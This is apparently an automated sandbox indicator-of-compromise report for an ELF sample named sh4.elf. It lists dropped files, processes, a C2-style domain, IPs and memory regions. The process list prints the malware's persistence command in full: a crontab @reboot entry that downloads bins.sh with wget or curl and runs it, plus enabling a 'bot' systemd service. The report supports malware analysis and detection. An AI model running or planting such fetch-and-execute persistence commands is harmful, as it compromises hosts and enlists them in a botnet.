IOC Report
sh4.elf

loading gif

Files

File Path
Type
Category
Malicious
sh4.elf
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.xheE4S
ASCII text
dropped
malicious
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/usr/lib/systemd/system/bot.service
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/sh4.elf
/tmp/sh4.elf
/tmp/sh4.elf
-
/tmp/sh4.elf
-
/tmp/sh4.elf
-
/tmp/sh4.elf
-
/tmp/sh4.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/bin/sh
-
/usr/bin/sh
sh bins.sh
/bin/sh
-
/bin/curl
/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/usr/bin/sh
sh bins.sh
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/sh4.elf
-
/bin/sh
sh -c "/bin/systemctl enable bot"
/bin/sh
-
/bin/systemctl
/bin/systemctl enable bot
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0
There are 21 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://serverip/bins/bins.sh
unknown
http://serverip/bins/bins.sh;
unknown

Domains

Name
IP
Malicious
host.zopz-api.com
172.111.38.48

IPs

IP
Domain
Country
Malicious
34.249.145.219
unknown
United States
172.111.38.48
host.zopz-api.com
Reserved
109.202.202.202
unknown
Switzerland
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f4fabded000
page read and write
55f22130a000
page execute read
55f22353d000
page read and write
7f4fac8d7000
page read and write
7f4fac924000
page read and write
7f4fa4000000
page read and write
7f4fac8df000
page read and write
7f4f24410000
page execute read
7f4fab5dc000
page read and write
7f4fac43e000
page read and write
7f4fac7ae000
page read and write
7f4fac43e000
page read and write
7f4f24427000
page read and write
55f221528000
page read and write
7fff46832000
page read and write
7f4f24420000
page read and write
7f4fac8d7000
page read and write
7fff4691c000
page execute read
55f2248f0000
page read and write
7fff4691c000
page execute read
55f221528000
page read and write
55f2248d0000
page read and write
7f4f24420000
page read and write
7f4fabded000
page read and write
7f4fa4021000
page read and write
7f4fabddf000
page read and write
7f4fac07c000
page read and write
55f221520000
page read and write
7f4fa4021000
page read and write
7f4fac924000
page read and write
7f4fac8df000
page read and write
7f4fac07c000
page read and write
7f4fac7ae000
page read and write
7f4fac463000
page read and write
55f221520000
page read and write
55f223526000
page execute and read and write
55f2248d0000
page read and write
7f4f24429000
page read and write
7f4fabddf000
page read and write
55f223526000
page execute and read and write
7f4f24427000
page read and write
7f4fac463000
page read and write
7f4fa4000000
page read and write
7fff46832000
page read and write
7f4f24410000
page execute read
55f22130a000
page execute read
7f4fab5dc000
page read and write
55f22353d000
page read and write
There are 38 hidden memdumps, click here to show them.